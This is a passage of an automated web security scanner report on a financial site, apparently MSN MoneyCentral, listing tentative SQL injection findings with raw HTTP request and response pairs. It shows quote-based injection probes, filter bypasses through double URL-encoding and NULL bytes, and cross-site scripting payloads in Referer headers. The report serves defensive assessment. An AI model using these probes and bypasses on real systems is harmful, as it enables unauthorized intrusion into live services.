Path:   /inc/scr/userchoice.js

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT
Accept-Ranges: bytes
ETag: "803fbbe4b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:55:24 GMT
Content-Length: 600


function _usrChGetCrnt(key)
{var
opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;}
function _u
...[SNIP]...

1.42. http://redacted/inc/scr/userchoice.js [__qca cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/scr/userchoice.js

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610'; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:28 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610''; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT
Accept-Ranges: bytes
ETag: "803fbbe4b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:28 GMT
Content-Length: 600


function _usrChGetCrnt(key)
{var
opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;}
function _u
...[SNIP]...

1.43. http://redacted/inc/scr/ww.js [mh cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/scr/ww.js

Issue detail

The mh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the mh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/scr/ww.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT%2527; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 17:33:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/ww.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT%2527%2527; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:37:48 GMT
Accept-Ranges: bytes
ETag: "026d05fb8abcb1:161bf"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:33:50 GMT
Content-Length: 10184


String.prototype.WWtrim=function()
{return this.replace(/(^\s*)|(\s*$)/g,"");}
String.prototype.WWpeek=function()
{(/([^,;]+)$/i).exec(this);return RegExp.$1;}
String.prototype.WWhighlight=funct
...[SNIP]...

1.44. http://redacted/investor/StockRating/srsmain.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srsmain.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/StockRating/srsmain.asp?1%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:55 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/StockRating/srsmain.asp?1%2527%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:55 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.45. http://redacted/investor/StockRating/srstopstocksresults.aspx [MUID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Connection: close
Date: Sun, 30 Jan 2011 02:15:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Content-Type: text/html

<html><body><h1>Server is too busy</h1></body></html>

Request 2

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:15:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.46. http://redacted/investor/StockRating/srstopstocksresults.aspx [expid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2';

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:33 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2'';

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56048


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.47. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4'; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:16c4d"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:23 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4''; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56048


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.48. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:18 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.49. http://redacted/investor/charts/chartdl.aspx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:36 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:09:37 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24676


